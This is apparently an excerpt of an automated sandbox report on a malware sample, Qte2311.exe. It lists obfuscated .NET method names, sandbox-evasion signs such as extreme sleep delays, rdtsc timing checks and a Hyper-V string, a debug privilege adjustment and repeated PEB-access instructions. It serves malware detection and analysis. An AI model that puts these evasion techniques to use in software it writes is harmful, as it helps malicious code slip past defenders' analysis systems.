Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs High entropy of concatenated method names: 'EIVIQSkH7H', 'TA7IWpuOcg', 'uFFIrlAF8X', 'U70IZP1COR', 'naIIw5fwfw', 'ui6IPxvgky', 'bpFIFX2qc4', 'nn6IpsYJLE', 'dakIcYNgGC', 'DWUIaRKRJf'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, ovhRaAGpf1fMbU5l9h.cs High entropy of concatenated method names: 'ToString', 'kfkMV0Y6KM', 'pHhMK4MvLo', 'wQfM0QuLCP', 'SGuML4Am2X', 'dbkMRiHdL7', 'RRVMU42owk', 'l4DMDtESw2', 'NVZMA1XqN3', 'gOHM1Z6RsP'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, cC3eJfhCkmhjbdHysN.cs High entropy of concatenated method names: 'OZXXWFmXPa', 'IArXrMQh9L', 'ifRXZqMAf5', 'brnXwmbyhC', 'StXXPd4LIx', 'GCLXFMdwaS', 'jQkXpk34NO', 'cmFXcI8PeY', 'wcXXa7854p', 'U6jXtfJqFv'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, meriZ7EYoOBu2ojZb8.cs High entropy of concatenated method names: 'w7fHhlfmqD', 'TdRHkDwv0T', 'cxIXsI2bOO', 'Qw8XybGeUr', 'VYeHVtWfJ4', 'w4RH9Rk82k', 'N1vH7pyY7w', 'tm6H40Qvds', 'SLXHJqDStj', 'TyrHGGHNbQ'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, bWXE278xdQ8qkeWCIX.cs High entropy of concatenated method names: 'Dn9PQl9BeS', 'HVIPrwTRyA', 'h8aPw25IfY', 'PbQPFtPtFm', 'JJSPpf2kmB', 'WFUwf4Vp10', 'xA6wEPbxu3', 'mH0wSVV4o1', 'P02whNqfnw', 'tZSwCyMQFL'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, NQYow7deJNioTERq6h.cs High entropy of concatenated method names: 'YY42tKnFY', 'wqKev2KiW', 'xGbuxUycS', 'qXqol7dS9', 'lELBoVp9k', 'UclmtNCf8', 'srmumlG0GGbFwFGjal', 'ReIMv2jdeqtemx1Qfg', 'UCfXrTJhu', 'r60vVFD7b'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, wfAySfgxmRVIktpuXE.cs High entropy of concatenated method names: 'ctZr43FsKS', 'To9rJyUqXo', 'S9drGlpDEr', 'UutrlnijEg', 'i5JrfEdNfw', 'K6erET80bH', 'WPPrSTlAx4', 'DEJrhK6TAT', 'uAbrCAgx9a', 'QGprkt0gcO'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, iQCLXtrLIG6D8GYfAs.cs High entropy of concatenated method names: 'Dispose', 'kDsyCnc8j6', 'U3HdKcOSrw', 'F4rRRfwpCa', 'HdCyk3eJfC', 'YmhyzjbdHy', 'ProcessDialogKey', 'aNfds5pRMP', 'm6VdyC6HGf', 'oEZddast9X'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, FAQOrgyIQbmeQ1OYZno.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpgv4rLqD5', 'gkMvJtpn2k', 'b1WvGswW6o', 've4vlYk3wg', 'nc0vfsW4HT', 'Y2hvEWdEUO', 'jnJvS9AsIZ'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, KhxNDu1Lf1HxQS38aY.cs High entropy of concatenated method names: 'WTKFYE264Z', 'ldSFTpt4nN', 'uKtF24eYDg', 'POHFelECrO', 'hmFFjFGCX2', 'fNfFuWkwGB', 'kGAFoHJSAW', 'PZ2Fg6n3ns', 'sLEFBkFdtP', 'Wa8FmcKLmW'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, mst9XkkeDYOXv81Yuy.cs High entropy of concatenated method names: 'UMpxy1lwB4', 'BppxIK8YJR', 'Lwbxndn8Db', 'lvVxWrxnft', 'PyqxrhBv3M', 'Q8rxwC5Lwx', 'TfLxP3i7v5', 'K3XXS6t6fd', 'Q9XXhvnqJD', 'EGYXCyTQcl'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, XiuuH8DXABAeATYjnw.cs High entropy of concatenated method names: 'Dn3FWmjfeq', 'x85FZi0UhN', 'OQcFPbeiod', 'PMxPkO0joH', 'hevPzRsnlZ', 'mpQFskqNDh', 'VLsFy3fJyk', 'jbMFdZ1dCA', 'fKJFIIsbxO', 'xm4Fne1T0R'
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\runas.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Qte2311.exe PID: 7420, type: MEMORYSTR
Source: C:\Users\user\Desktop\Qte2311.exe TID: 7444 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\runas.exe TID: 7712 Thread sleep count: 243 > 30
Source: C:\Windows\SysWOW64\runas.exe TID: 7712 Thread sleep time: -486000s >= -30000s
Source: C:\Windows\SysWOW64\runas.exe TID: 7712 Thread sleep count: 9727 > 30
Source: C:\Windows\SysWOW64\runas.exe TID: 7712 Thread sleep time: -19454000s >= -30000s
Source: C:\Program Files (x86)\jFJKUzqwKIBdWDkcySLyDBhTBgNTKdOJMfgYJclsrVfAJDMiwJDDVHpOzszTWBY\SoZyKEDyfEWrMWEFcBvwSAkabc.exe TID: 7776 Thread sleep time: -65000s >= -30000s
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0188096E rdtsc 3_2_0188096E
Source: C:\Users\user\Desktop\Qte2311.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\runas.exe Window / User API: threadDelayed 9727
Source: C:\Users\user\Desktop\Qte2311.exe API coverage: 1.3 %
Source: C:\Windows\SysWOW64\runas.exe API coverage: 2.9 %
Source: C:\Users\user\Desktop\Qte2311.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FABB80 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FABB80
Source: C:\Users\user\Desktop\Qte2311.exe Thread delayed: delay time: 922337203685477
Source: runas.exe, 00000005.00000002.4113575754.0000000007D38000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4110106920.00000000033FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4110438213.00000000007DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0188096E rdtsc 3_2_0188096E
Source: C:\Users\user\Desktop\Qte2311.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FC188 mov eax, dword ptr fs:[00000030h] 3_2_018FC188
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01880185 mov eax, dword ptr fs:[00000030h] 3_2_01880185
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E4180 mov eax, dword ptr fs:[00000030h] 3_2_018E4180
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C019F mov eax, dword ptr fs:[00000030h] 3_2_018C019F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183A197 mov eax, dword ptr fs:[00000030h] 3_2_0183A197
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019061C3 mov eax, dword ptr fs:[00000030h] 3_2_019061C3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018BE1D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BE1D0 mov ecx, dword ptr fs:[00000030h] 3_2_018BE1D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018BE1D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019161E5 mov eax, dword ptr fs:[00000030h] 3_2_019161E5
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018701F8 mov eax, dword ptr fs:[00000030h] 3_2_018701F8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01900115 mov eax, dword ptr fs:[00000030h] 3_2_01900115
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EA118 mov ecx, dword ptr fs:[00000030h] 3_2_018EA118
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EA118 mov eax, dword ptr fs:[00000030h] 3_2_018EA118
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01870124 mov eax, dword ptr fs:[00000030h] 3_2_01870124
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h] 3_2_018D4144
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D4144 mov ecx, dword ptr fs:[00000030h] 3_2_018D4144
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h] 3_2_018D4144
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01846154 mov eax, dword ptr fs:[00000030h] 3_2_01846154
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183C156 mov eax, dword ptr fs:[00000030h] 3_2_0183C156
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D8158 mov eax, dword ptr fs:[00000030h] 3_2_018D8158
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01914164 mov eax, dword ptr fs:[00000030h] 3_2_01914164
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0184208A mov eax, dword ptr fs:[00000030h] 3_2_0184208A
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018380A0 mov eax, dword ptr fs:[00000030h] 3_2_018380A0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D80A8 mov eax, dword ptr fs:[00000030h] 3_2_018D80A8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019060B8 mov eax, dword ptr fs:[00000030h] 3_2_019060B8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019060B8 mov ecx, dword ptr fs:[00000030h] 3_2_019060B8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C20DE mov eax, dword ptr fs:[00000030h] 3_2_018C20DE
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183A0E3 mov ecx, dword ptr fs:[00000030h] 3_2_0183A0E3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C60E0 mov eax, dword ptr fs:[00000030h] 3_2_018C60E0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018480E9 mov eax, dword ptr fs:[00000030h] 3_2_018480E9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183C0F0 mov eax, dword ptr fs:[00000030h] 3_2_0183C0F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018820F0 mov ecx, dword ptr fs:[00000030h] 3_2_018820F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C4000 mov ecx, dword ptr fs:[00000030h] 3_2_018C4000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h] 3_2_0185E016
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183A020 mov eax, dword ptr fs:[00000030h] 3_2_0183A020
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183C020 mov eax, dword ptr fs:[00000030h] 3_2_0183C020
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D6030 mov eax, dword ptr fs:[00000030h] 3_2_018D6030
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01842050 mov eax, dword ptr fs:[00000030h] 3_2_01842050
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C6050 mov eax, dword ptr fs:[00000030h] 3_2_018C6050
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186C073 mov eax, dword ptr fs:[00000030h] 3_2_0186C073
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186438F mov eax, dword ptr fs:[00000030h]